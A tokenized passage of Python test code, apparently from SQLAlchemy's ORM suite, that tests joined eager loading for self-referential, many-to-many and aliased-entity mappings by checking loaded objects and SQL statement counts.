a , m2m , b = ( <EOL> self . tables . a , <EOL> self . tables . m2m , <EOL> self . tables . b ) <EOL> class A ( fixtures . ComparableEntity ) : <EOL> pass <EOL> class B ( fixtures . ComparableEntity ) : <EOL> pass <EOL> mapper ( A , a , properties = { <EOL> '<STR_LIT>' : relationship ( <EOL> B , secondary = m2m , lazy = '<STR_LIT>' , order_by = m2m . c . id ) <EOL> } ) <EOL> mapper ( B , b ) <EOL> sess = create_session ( ) <EOL> eq_ ( sess . query ( A ) . all ( ) , <EOL> [ <EOL> A ( data = '<STR_LIT>' , bs = [ B ( data = '<STR_LIT>' ) , B ( data = '<STR_LIT>' ) , B ( data = '<STR_LIT>' ) ] ) , <EOL> A ( bs = [ B ( data = '<STR_LIT>' ) , B ( data = '<STR_LIT>' ) , B ( data = '<STR_LIT>' ) ] ) <EOL> ] ) <EOL> class SelfReferentialEagerTest ( fixtures . MappedTest ) : <EOL> @ classmethod <EOL> def define_tables ( cls , metadata ) : <EOL> Table ( '<STR_LIT>' , metadata , <EOL> Column ( <EOL> '<STR_LIT:id>' , <EOL> Integer , <EOL> primary_key = True , <EOL> test_needs_autoincrement = True ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT:data>' , String ( <NUM_LIT:30> ) ) ) <EOL> def test_basic ( self ) : <EOL> nodes = self . tables . nodes <EOL> class Node ( fixtures . ComparableEntity ) : <EOL> def append ( self , node ) : <EOL> self . children . append ( node ) <EOL> mapper ( Node , nodes , properties = { <EOL> '<STR_LIT>' : relationship ( Node , <EOL> lazy = '<STR_LIT>' , <EOL> join_depth = <NUM_LIT:3> , order_by = nodes . c . id ) <EOL> } ) <EOL> sess = create_session ( ) <EOL> n1 = Node ( data = '<STR_LIT>' ) <EOL> n1 . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . children [ <NUM_LIT:1> ] . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . children [ <NUM_LIT:1> ] . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . children [ <NUM_LIT:1> ] . append ( Node ( data = '<STR_LIT>' ) ) <EOL> sess . 
add ( n1 ) <EOL> sess . flush ( ) <EOL> sess . expunge_all ( ) <EOL> def go ( ) : <EOL> d = sess . query ( Node ) . filter_by ( data = '<STR_LIT>' ) . all ( ) [ <NUM_LIT:0> ] <EOL> eq_ ( Node ( data = '<STR_LIT>' , children = [ <EOL> Node ( data = '<STR_LIT>' ) , <EOL> Node ( data = '<STR_LIT>' , children = [ <EOL> Node ( data = '<STR_LIT>' ) , <EOL> Node ( data = '<STR_LIT>' ) , <EOL> Node ( data = '<STR_LIT>' ) <EOL> ] ) , <EOL> Node ( data = '<STR_LIT>' ) <EOL> ] ) , d ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> sess . expunge_all ( ) <EOL> def go ( ) : <EOL> d = sess . query ( Node ) . filter_by ( data = '<STR_LIT>' ) . first ( ) <EOL> eq_ ( Node ( data = '<STR_LIT>' , children = [ <EOL> Node ( data = '<STR_LIT>' ) , <EOL> Node ( data = '<STR_LIT>' , children = [ <EOL> Node ( data = '<STR_LIT>' ) , <EOL> Node ( data = '<STR_LIT>' ) , <EOL> Node ( data = '<STR_LIT>' ) <EOL> ] ) , <EOL> Node ( data = '<STR_LIT>' ) <EOL> ] ) , d ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_lazy_fallback_doesnt_affect_eager ( self ) : <EOL> nodes = self . tables . nodes <EOL> class Node ( fixtures . ComparableEntity ) : <EOL> def append ( self , node ) : <EOL> self . children . append ( node ) <EOL> mapper ( Node , nodes , properties = { <EOL> '<STR_LIT>' : relationship ( Node , lazy = '<STR_LIT>' , join_depth = <NUM_LIT:1> , <EOL> order_by = nodes . c . id ) <EOL> } ) <EOL> sess = create_session ( ) <EOL> n1 = Node ( data = '<STR_LIT>' ) <EOL> n1 . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . children [ <NUM_LIT:1> ] . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . children [ <NUM_LIT:1> ] . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . children [ <NUM_LIT:1> ] . append ( Node ( data = '<STR_LIT>' ) ) <EOL> sess . add ( n1 ) <EOL> sess . flush ( ) <EOL> sess . 
expunge_all ( ) <EOL> def go ( ) : <EOL> allnodes = sess . query ( Node ) . order_by ( Node . data ) . all ( ) <EOL> n12 = allnodes [ <NUM_LIT:2> ] <EOL> eq_ ( n12 . data , '<STR_LIT>' ) <EOL> eq_ ( [ <EOL> Node ( data = '<STR_LIT>' ) , <EOL> Node ( data = '<STR_LIT>' ) , <EOL> Node ( data = '<STR_LIT>' ) <EOL> ] , list ( n12 . children ) ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_with_deferred ( self ) : <EOL> nodes = self . tables . nodes <EOL> class Node ( fixtures . ComparableEntity ) : <EOL> def append ( self , node ) : <EOL> self . children . append ( node ) <EOL> mapper ( Node , nodes , properties = { <EOL> '<STR_LIT>' : relationship ( Node , lazy = '<STR_LIT>' , join_depth = <NUM_LIT:3> , <EOL> order_by = nodes . c . id ) , <EOL> '<STR_LIT:data>' : deferred ( nodes . c . data ) <EOL> } ) <EOL> sess = create_session ( ) <EOL> n1 = Node ( data = '<STR_LIT>' ) <EOL> n1 . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . append ( Node ( data = '<STR_LIT>' ) ) <EOL> sess . add ( n1 ) <EOL> sess . flush ( ) <EOL> sess . expunge_all ( ) <EOL> def go ( ) : <EOL> eq_ ( <EOL> Node ( data = '<STR_LIT>' , children = [ Node ( data = '<STR_LIT>' ) , Node ( data = '<STR_LIT>' ) ] ) , <EOL> sess . query ( Node ) . order_by ( Node . id ) . first ( ) , <EOL> ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:4> ) <EOL> sess . expunge_all ( ) <EOL> def go ( ) : <EOL> eq_ ( Node ( data = '<STR_LIT>' , children = [ Node ( data = '<STR_LIT>' ) , Node ( data = '<STR_LIT>' ) ] ) , <EOL> sess . query ( Node ) . <EOL> options ( undefer ( '<STR_LIT:data>' ) ) . order_by ( Node . id ) . first ( ) ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:3> ) <EOL> sess . expunge_all ( ) <EOL> def go ( ) : <EOL> eq_ ( Node ( data = '<STR_LIT>' , children = [ Node ( data = '<STR_LIT>' ) , Node ( data = '<STR_LIT>' ) ] ) , <EOL> sess . query ( Node ) . options ( undefer ( '<STR_LIT:data>' ) , <EOL> undefer ( '<STR_LIT>' ) ) . 
first ( ) ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_options ( self ) : <EOL> nodes = self . tables . nodes <EOL> class Node ( fixtures . ComparableEntity ) : <EOL> def append ( self , node ) : <EOL> self . children . append ( node ) <EOL> mapper ( Node , nodes , properties = { <EOL> '<STR_LIT>' : relationship ( Node , lazy = '<STR_LIT>' , order_by = nodes . c . id ) <EOL> } ) <EOL> sess = create_session ( ) <EOL> n1 = Node ( data = '<STR_LIT>' ) <EOL> n1 . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . children [ <NUM_LIT:1> ] . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . children [ <NUM_LIT:1> ] . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . children [ <NUM_LIT:1> ] . append ( Node ( data = '<STR_LIT>' ) ) <EOL> sess . add ( n1 ) <EOL> sess . flush ( ) <EOL> sess . expunge_all ( ) <EOL> def go ( ) : <EOL> d = sess . query ( Node ) . filter_by ( data = '<STR_LIT>' ) . order_by ( Node . id ) . options ( joinedload ( '<STR_LIT>' ) ) . first ( ) <EOL> eq_ ( Node ( data = '<STR_LIT>' , children = [ <EOL> Node ( data = '<STR_LIT>' ) , <EOL> Node ( data = '<STR_LIT>' , children = [ <EOL> Node ( data = '<STR_LIT>' ) , <EOL> Node ( data = '<STR_LIT>' ) , <EOL> Node ( data = '<STR_LIT>' ) <EOL> ] ) , <EOL> Node ( data = '<STR_LIT>' ) <EOL> ] ) , d ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:2> ) <EOL> def go ( ) : <EOL> sess . query ( Node ) . order_by ( Node . id ) . filter_by ( data = '<STR_LIT>' ) . options ( joinedload ( '<STR_LIT>' ) ) . first ( ) <EOL> self . assert_sql_execution ( <EOL> testing . db , go , <EOL> CompiledSQL ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> { '<STR_LIT>' : '<STR_LIT>' } <EOL> ) <EOL> ) <EOL> def test_no_depth ( self ) : <EOL> nodes = self . tables . nodes <EOL> class Node ( fixtures . 
ComparableEntity ) : <EOL> def append ( self , node ) : <EOL> self . children . append ( node ) <EOL> mapper ( Node , nodes , properties = { <EOL> '<STR_LIT>' : relationship ( Node , lazy = '<STR_LIT>' ) <EOL> } ) <EOL> sess = create_session ( ) <EOL> n1 = Node ( data = '<STR_LIT>' ) <EOL> n1 . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . children [ <NUM_LIT:1> ] . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . children [ <NUM_LIT:1> ] . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . children [ <NUM_LIT:1> ] . append ( Node ( data = '<STR_LIT>' ) ) <EOL> sess . add ( n1 ) <EOL> sess . flush ( ) <EOL> sess . expunge_all ( ) <EOL> def go ( ) : <EOL> d = sess . query ( Node ) . filter_by ( data = '<STR_LIT>' ) . first ( ) <EOL> eq_ ( Node ( data = '<STR_LIT>' , children = [ <EOL> Node ( data = '<STR_LIT>' ) , <EOL> Node ( data = '<STR_LIT>' , children = [ <EOL> Node ( data = '<STR_LIT>' ) , <EOL> Node ( data = '<STR_LIT>' ) , <EOL> Node ( data = '<STR_LIT>' ) <EOL> ] ) , <EOL> Node ( data = '<STR_LIT>' ) <EOL> ] ) , d ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:3> ) <EOL> class MixedSelfReferentialEagerTest ( fixtures . MappedTest ) : <EOL> @ classmethod <EOL> def define_tables ( cls , metadata ) : <EOL> Table ( '<STR_LIT>' , metadata , <EOL> Column ( <EOL> '<STR_LIT:id>' , <EOL> Integer , <EOL> primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> ) <EOL> Table ( '<STR_LIT>' , metadata , <EOL> Column ( <EOL> '<STR_LIT:id>' , <EOL> Integer , <EOL> primary_key = True , <EOL> test_needs_autoincrement = True ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) ) <EOL> @ classmethod <EOL> def setup_mappers ( cls ) : <EOL> b_table , a_table = cls . tables . b_table , cls . 
tables . a_table <EOL> class A ( cls . Comparable ) : <EOL> pass <EOL> class B ( cls . Comparable ) : <EOL> pass <EOL> mapper ( A , a_table ) <EOL> mapper ( B , b_table , properties = { <EOL> '<STR_LIT>' : relationship ( <EOL> B , <EOL> remote_side = [ b_table . c . id ] , <EOL> primaryjoin = ( b_table . c . parent_b1_id == b_table . c . id ) , <EOL> order_by = b_table . c . id <EOL> ) , <EOL> '<STR_LIT>' : relationship ( A , lazy = True ) , <EOL> '<STR_LIT>' : relationship ( <EOL> B , <EOL> remote_side = [ b_table . c . id ] , <EOL> primaryjoin = ( b_table . c . parent_b2_id == b_table . c . id ) , <EOL> order_by = b_table . c . id <EOL> ) <EOL> } ) <EOL> @ classmethod <EOL> def insert_data ( cls ) : <EOL> b_table , a_table = cls . tables . b_table , cls . tables . a_table <EOL> a_table . insert ( ) . execute ( dict ( id = <NUM_LIT:1> ) , dict ( id = <NUM_LIT:2> ) , dict ( id = <NUM_LIT:3> ) ) <EOL> b_table . insert ( ) . execute ( <EOL> dict ( id = <NUM_LIT:1> , parent_a_id = <NUM_LIT:2> , parent_b1_id = None , parent_b2_id = None ) , <EOL> dict ( id = <NUM_LIT:2> , parent_a_id = <NUM_LIT:1> , parent_b1_id = <NUM_LIT:1> , parent_b2_id = None ) , <EOL> dict ( id = <NUM_LIT:3> , parent_a_id = <NUM_LIT:1> , parent_b1_id = <NUM_LIT:1> , parent_b2_id = <NUM_LIT:2> ) , <EOL> dict ( id = <NUM_LIT:4> , parent_a_id = <NUM_LIT:3> , parent_b1_id = <NUM_LIT:1> , parent_b2_id = None ) , <EOL> dict ( id = <NUM_LIT:5> , parent_a_id = <NUM_LIT:3> , parent_b1_id = None , parent_b2_id = <NUM_LIT:2> ) , <EOL> dict ( id = <NUM_LIT:6> , parent_a_id = <NUM_LIT:1> , parent_b1_id = <NUM_LIT:1> , parent_b2_id = <NUM_LIT:3> ) , <EOL> dict ( id = <NUM_LIT:7> , parent_a_id = <NUM_LIT:2> , parent_b1_id = None , parent_b2_id = <NUM_LIT:3> ) , <EOL> dict ( id = <NUM_LIT:8> , parent_a_id = <NUM_LIT:2> , parent_b1_id = <NUM_LIT:1> , parent_b2_id = <NUM_LIT:2> ) , <EOL> dict ( id = <NUM_LIT:9> , parent_a_id = None , parent_b1_id = <NUM_LIT:1> , parent_b2_id = None ) , <EOL> dict ( id = 
<NUM_LIT:10> , parent_a_id = <NUM_LIT:3> , parent_b1_id = <NUM_LIT:7> , parent_b2_id = <NUM_LIT:2> ) , <EOL> dict ( id = <NUM_LIT:11> , parent_a_id = <NUM_LIT:3> , parent_b1_id = <NUM_LIT:1> , parent_b2_id = <NUM_LIT:8> ) , <EOL> dict ( id = <NUM_LIT:12> , parent_a_id = <NUM_LIT:2> , parent_b1_id = <NUM_LIT:5> , parent_b2_id = <NUM_LIT:2> ) , <EOL> dict ( id = <NUM_LIT> , parent_a_id = <NUM_LIT:3> , parent_b1_id = <NUM_LIT:4> , parent_b2_id = <NUM_LIT:4> ) , <EOL> dict ( id = <NUM_LIT> , parent_a_id = <NUM_LIT:3> , parent_b1_id = <NUM_LIT:7> , parent_b2_id = <NUM_LIT:2> ) , <EOL> ) <EOL> def test_eager_load ( self ) : <EOL> A , B = self . classes . A , self . classes . B <EOL> session = create_session ( ) <EOL> def go ( ) : <EOL> eq_ ( <EOL> session . query ( B ) . <EOL> options ( <EOL> joinedload ( '<STR_LIT>' ) , <EOL> joinedload ( '<STR_LIT>' ) , <EOL> joinedload ( '<STR_LIT>' ) <EOL> ) . <EOL> filter ( B . id . in_ ( [ <NUM_LIT:2> , <NUM_LIT:8> , <NUM_LIT:11> ] ) ) . order_by ( B . id ) . all ( ) , <EOL> [ <EOL> B ( id = <NUM_LIT:2> , <EOL> parent_z = A ( id = <NUM_LIT:1> ) , <EOL> parent_b1 = B ( id = <NUM_LIT:1> ) , <EOL> parent_b2 = None ) , <EOL> B ( id = <NUM_LIT:8> , <EOL> parent_z = A ( id = <NUM_LIT:2> ) , <EOL> parent_b1 = B ( id = <NUM_LIT:1> ) , <EOL> parent_b2 = B ( id = <NUM_LIT:2> ) ) , <EOL> B ( id = <NUM_LIT:11> , <EOL> parent_z = A ( id = <NUM_LIT:3> ) , <EOL> parent_b1 = B ( id = <NUM_LIT:1> ) , <EOL> parent_b2 = B ( id = <NUM_LIT:8> ) ) <EOL> ] <EOL> ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> class SelfReferentialM2MEagerTest ( fixtures . MappedTest ) : <EOL> @ classmethod <EOL> def define_tables ( cls , metadata ) : <EOL> Table ( '<STR_LIT>' , metadata , <EOL> Column ( <EOL> '<STR_LIT:id>' , <EOL> Integer , <EOL> primary_key = True , <EOL> test_needs_autoincrement = True ) , <EOL> Column ( '<STR_LIT:name>' , sa . 
String ( <NUM_LIT> ) , nullable = False , unique = True ) , <EOL> ) <EOL> Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> sa . UniqueConstraint ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) <EOL> def test_basic ( self ) : <EOL> widget , widget_rel = self . tables . widget , self . tables . widget_rel <EOL> class Widget ( fixtures . ComparableEntity ) : <EOL> pass <EOL> mapper ( Widget , widget , properties = { <EOL> '<STR_LIT>' : relationship ( <EOL> Widget , secondary = widget_rel , <EOL> primaryjoin = widget_rel . c . parent_id == widget . c . id , <EOL> secondaryjoin = widget_rel . c . child_id == widget . c . id , <EOL> lazy = '<STR_LIT>' , join_depth = <NUM_LIT:1> , <EOL> ) <EOL> } ) <EOL> sess = create_session ( ) <EOL> w1 = Widget ( name = '<STR_LIT>' ) <EOL> w2 = Widget ( name = '<STR_LIT>' ) <EOL> w1 . children . append ( w2 ) <EOL> sess . add ( w1 ) <EOL> sess . flush ( ) <EOL> sess . expunge_all ( ) <EOL> eq_ ( [ Widget ( name = '<STR_LIT>' , children = [ Widget ( name = '<STR_LIT>' ) ] ) ] , <EOL> sess . query ( Widget ) . filter ( Widget . name == '<STR_LIT>' ) . all ( ) ) <EOL> class MixedEntitiesTest ( _fixtures . FixtureTest , testing . AssertsCompiledSQL ) : <EOL> run_setup_mappers = '<STR_LIT>' <EOL> run_inserts = '<STR_LIT>' <EOL> run_deletes = None <EOL> __dialect__ = '<STR_LIT:default>' <EOL> __prefer_backends__ = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> @ classmethod <EOL> def setup_mappers ( cls ) : <EOL> users , Keyword , items , order_items , orders , Item , User , Address , keywords , Order , item_keywords , addresses = ( <EOL> cls . tables . users , <EOL> cls . classes . Keyword , <EOL> cls . tables . items , <EOL> cls . tables . order_items , <EOL> cls . tables . orders , <EOL> cls . classes . Item , <EOL> cls . classes . User , <EOL> cls . classes . Address , <EOL> cls . tables . keywords , <EOL> cls . 
classes . Order , <EOL> cls . tables . item_keywords , <EOL> cls . tables . addresses ) <EOL> mapper ( User , users , properties = { <EOL> '<STR_LIT>' : relationship ( Address , backref = '<STR_LIT:user>' ) , <EOL> '<STR_LIT>' : relationship ( Order , backref = '<STR_LIT:user>' ) , <EOL> } ) <EOL> mapper ( Address , addresses ) <EOL> mapper ( Order , orders , properties = { <EOL> '<STR_LIT>' : relationship ( <EOL> Item , secondary = order_items , order_by = items . c . id ) , <EOL> } ) <EOL> mapper ( Item , items , properties = { <EOL> '<STR_LIT>' : relationship ( Keyword , secondary = item_keywords ) <EOL> } ) <EOL> mapper ( Keyword , keywords ) <EOL> def test_two_entities ( self ) : <EOL> Item , Order , User , Address = ( self . classes . Item , <EOL> self . classes . Order , <EOL> self . classes . User , <EOL> self . classes . Address ) <EOL> sess = create_session ( ) <EOL> def go ( ) : <EOL> eq_ ( <EOL> [ <EOL> ( User ( id = <NUM_LIT:9> , addresses = [ Address ( id = <NUM_LIT:5> ) ] ) , <EOL> Order ( id = <NUM_LIT:2> , items = [ <EOL> Item ( id = <NUM_LIT:1> ) , Item ( id = <NUM_LIT:2> ) , Item ( id = <NUM_LIT:3> ) ] ) ) , <EOL> ( User ( id = <NUM_LIT:9> , addresses = [ Address ( id = <NUM_LIT:5> ) ] ) , <EOL> Order ( id = <NUM_LIT:4> , items = [ <EOL> Item ( id = <NUM_LIT:1> ) , Item ( id = <NUM_LIT:5> ) ] ) ) , <EOL> ] , <EOL> sess . query ( User , Order ) . filter ( User . id == Order . user_id ) . <EOL> options ( joinedload ( User . addresses ) , joinedload ( Order . items ) ) . <EOL> filter ( User . id == <NUM_LIT:9> ) . <EOL> order_by ( User . id , Order . id ) . all ( ) , <EOL> ) <EOL> self . assert_sql_count ( testing . 
db , go , <NUM_LIT:1> ) <EOL> def go ( ) : <EOL> eq_ ( <EOL> [ <EOL> ( User ( id = <NUM_LIT:9> , addresses = [ Address ( id = <NUM_LIT:5> ) ] ) , <EOL> Order ( id = <NUM_LIT:2> , items = [ <EOL> Item ( id = <NUM_LIT:1> ) , Item ( id = <NUM_LIT:2> ) , Item ( id = <NUM_LIT:3> ) ] ) ) , <EOL> ( User ( id = <NUM_LIT:9> , addresses = [ Address ( id = <NUM_LIT:5> ) ] ) , <EOL> Order ( id = <NUM_LIT:4> , items = [ <EOL> Item ( id = <NUM_LIT:1> ) , Item ( id = <NUM_LIT:5> ) ] ) ) , <EOL> ] , <EOL> sess . query ( User , Order ) . join ( User . orders ) . <EOL> options ( joinedload ( User . addresses ) , joinedload ( Order . items ) ) . <EOL> filter ( User . id == <NUM_LIT:9> ) . <EOL> order_by ( User . id , Order . id ) . all ( ) , <EOL> ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> @ testing . exclude ( <EOL> '<STR_LIT>' , '<STR_LIT:>>' , ( <NUM_LIT:0> , ) , "<STR_LIT>" ) <EOL> def test_two_entities_with_joins ( self ) : <EOL> Item , Order , User , Address = ( self . classes . Item , <EOL> self . classes . Order , <EOL> self . classes . User , <EOL> self . classes . 
Address ) <EOL> sess = create_session ( ) <EOL> def go ( ) : <EOL> u1 = aliased ( User ) <EOL> o1 = aliased ( Order ) <EOL> eq_ ( <EOL> [ <EOL> ( <EOL> User ( addresses = [ <EOL> Address ( email_address = '<STR_LIT>' ) ] , <EOL> name = '<STR_LIT>' ) , <EOL> Order ( description = '<STR_LIT>' , isopen = <NUM_LIT:0> , <EOL> items = [ <EOL> Item ( description = '<STR_LIT>' ) , <EOL> Item ( description = '<STR_LIT>' ) , <EOL> Item ( description = '<STR_LIT>' ) ] ) , <EOL> User ( addresses = [ <EOL> Address ( email_address = '<STR_LIT>' ) ] , <EOL> name = '<STR_LIT>' ) , <EOL> Order ( description = '<STR_LIT>' , isopen = <NUM_LIT:1> , <EOL> items = [ <EOL> Item ( description = '<STR_LIT>' ) , <EOL> Item ( description = '<STR_LIT>' ) , <EOL> Item ( description = '<STR_LIT>' ) ] ) <EOL> ) , <EOL> ( <EOL> User ( <EOL> addresses = [ <EOL> Address ( <EOL> email_address = '<STR_LIT>' ) ] , <EOL> name = '<STR_LIT>' ) , <EOL> Order ( <EOL> description = '<STR_LIT>' , isopen = <NUM_LIT:0> , items = [ <EOL> Item ( <EOL> description = '<STR_LIT>' ) , Item ( <EOL> description = '<STR_LIT>' ) , Item ( <EOL> description = '<STR_LIT>' ) ] ) , <EOL> User ( <EOL> addresses = [ <EOL> Address ( <EOL> email_address = '<STR_LIT>' ) ] , <EOL> name = '<STR_LIT>' ) , <EOL> Order ( <EOL> address_id = None , <EOL> description = '<STR_LIT>' , <EOL> isopen = <NUM_LIT:0> , <EOL> items = [ <EOL> Item ( <EOL> description = '<STR_LIT>' ) ] ) <EOL> ) , <EOL> ( <EOL> User ( <EOL> addresses = [ <EOL> Address ( <EOL> email_address = '<STR_LIT>' ) ] , <EOL> name = '<STR_LIT>' ) , <EOL> Order ( <EOL> description = '<STR_LIT>' , isopen = <NUM_LIT:1> , items = [ <EOL> Item ( <EOL> description = '<STR_LIT>' ) , Item ( <EOL> description = '<STR_LIT>' ) ] ) , <EOL> User ( <EOL> addresses = [ <EOL> Address ( <EOL> email_address = '<STR_LIT>' ) ] , <EOL> name = '<STR_LIT>' ) , <EOL> Order ( <EOL> address_id = None , <EOL> description = '<STR_LIT>' , <EOL> isopen = <NUM_LIT:0> , <EOL> items = [ <EOL> Item ( <EOL> 
description = '<STR_LIT>' ) ] ) <EOL> ) , <EOL> ] , <EOL> sess . query ( User , Order , u1 , o1 ) . <EOL> join ( Order , User . orders ) . <EOL> options ( joinedload ( User . addresses ) , <EOL> joinedload ( Order . items ) ) . filter ( User . id == <NUM_LIT:9> ) . <EOL> join ( o1 , u1 . orders ) . <EOL> options ( joinedload ( u1 . addresses ) , <EOL> joinedload ( o1 . items ) ) . filter ( u1 . id == <NUM_LIT:7> ) . <EOL> filter ( Order . id < o1 . id ) . <EOL> order_by ( User . id , Order . id , u1 . id , o1 . id ) . all ( ) , <EOL> ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_aliased_entity_one ( self ) : <EOL> Item , Order , User , Address = ( self . classes . Item , <EOL> self . classes . Order , <EOL> self . classes . User , <EOL> self . classes . Address ) <EOL> sess = create_session ( ) <EOL> oalias = sa . orm . aliased ( Order ) <EOL> def go ( ) : <EOL> eq_ ( <EOL> [ <EOL> ( <EOL> User ( <EOL> id = <NUM_LIT:9> , addresses = [ <EOL> Address ( <EOL> id = <NUM_LIT:5> ) ] ) , Order ( <EOL> id = <NUM_LIT:2> , items = [ <EOL> Item ( <EOL> id = <NUM_LIT:1> ) , Item ( <EOL> id = <NUM_LIT:2> ) , Item ( <EOL> id = <NUM_LIT:3> ) ] ) ) , <EOL> ( User ( id = <NUM_LIT:9> , addresses = [ Address ( id = <NUM_LIT:5> ) ] ) , Order ( <EOL> id = <NUM_LIT:4> , items = [ Item ( id = <NUM_LIT:1> ) , Item ( id = <NUM_LIT:5> ) ] ) ) , <EOL> ] , <EOL> sess . query ( User , oalias ) . filter ( User . id == oalias . user_id ) . <EOL> options ( <EOL> joinedload ( User . addresses ) , <EOL> joinedload ( oalias . items ) ) . filter ( User . id == <NUM_LIT:9> ) . <EOL> order_by ( User . id , oalias . id ) . all ( ) , <EOL> ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_aliased_entity_two ( self ) : <EOL> Item , Order , User , Address = ( self . classes . Item , <EOL> self . classes . Order , <EOL> self . classes . User , <EOL> self . classes . Address ) <EOL> sess = create_session ( ) <EOL> oalias = sa . orm . 
aliased ( Order ) <EOL> def go ( ) : <EOL> eq_ ( <EOL> [ <EOL> ( <EOL> User ( <EOL> id = <NUM_LIT:9> , addresses = [ <EOL> Address ( <EOL> id = <NUM_LIT:5> ) ] ) , Order ( <EOL> id = <NUM_LIT:2> , items = [ <EOL> Item ( <EOL> id = <NUM_LIT:1> ) , Item ( <EOL> id = <NUM_LIT:2> ) , Item ( <EOL> id = <NUM_LIT:3> ) ] ) ) , <EOL> ( User ( id = <NUM_LIT:9> , addresses = [ Address ( id = <NUM_LIT:5> ) ] ) , Order ( <EOL> id = <NUM_LIT:4> , items = [ Item ( id = <NUM_LIT:1> ) , Item ( id = <NUM_LIT:5> ) ] ) ) , <EOL> ] , <EOL> sess . query ( User , oalias ) . join ( oalias , User . orders ) . <EOL> options ( joinedload ( User . addresses ) , <EOL> joinedload ( oalias . items ) ) . <EOL> filter ( User . id == <NUM_LIT:9> ) . <EOL> order_by ( User . id , oalias . id ) . all ( ) , <EOL> ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_aliased_entity_three ( self ) : <EOL> Order , User = ( <EOL> self . classes . Order , <EOL> self . classes . User ) <EOL> sess = create_session ( ) <EOL> oalias = sa . orm . aliased ( Order ) <EOL> self . assert_compile ( <EOL> sess . query ( User , oalias ) . join ( User . orders ) . <EOL> options ( joinedload ( oalias . items ) ) . with_labels ( ) . statement , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class SubqueryTest ( fixtures . 
MappedTest ) : <EOL> @ classmethod <EOL> def define_tables ( cls , metadata ) : <EOL> Table ( '<STR_LIT>' , metadata , <EOL> Column ( <EOL> '<STR_LIT:id>' , <EOL> Integer , <EOL> primary_key = True , <EOL> test_needs_autoincrement = True ) , <EOL> Column ( '<STR_LIT:name>' , String ( <NUM_LIT:16> ) ) <EOL> ) <EOL> Table ( '<STR_LIT>' , metadata , <EOL> Column ( <EOL> '<STR_LIT:id>' , <EOL> Integer , <EOL> primary_key = True , <EOL> test_needs_autoincrement = True ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( "<STR_LIT>" ) ) , <EOL> Column ( '<STR_LIT>' , sa . Float ) , <EOL> Column ( '<STR_LIT>' , sa . Float ) , <EOL> ) <EOL> def test_label_anonymizing ( self ) : <EOL> """<STR_LIT>""" <EOL> tags_table , users_table = self . tables . tags_table , self . tables . users_table <EOL> class User ( fixtures . ComparableEntity ) : <EOL> @ property <EOL> def prop_score ( self ) : <EOL> return sum ( [ tag . prop_score for tag in self . tags ] ) <EOL> class Tag ( fixtures . ComparableEntity ) : <EOL> @ property <EOL> def prop_score ( self ) : <EOL> return self . score1 * self . score2 <EOL> for labeled , labelname in [ ( True , '<STR_LIT>' ) , ( True , None ) , <EOL> ( False , None ) ] : <EOL> sa . orm . clear_mappers ( ) <EOL> tag_score = ( tags_table . c . score1 * tags_table . c . score2 ) <EOL> user_score = sa . select ( [ sa . func . sum ( tags_table . c . score1 * <EOL> tags_table . c . score2 ) ] , <EOL> tags_table . c . user_id == users_table . c . id ) <EOL> if labeled : <EOL> tag_score = tag_score . label ( 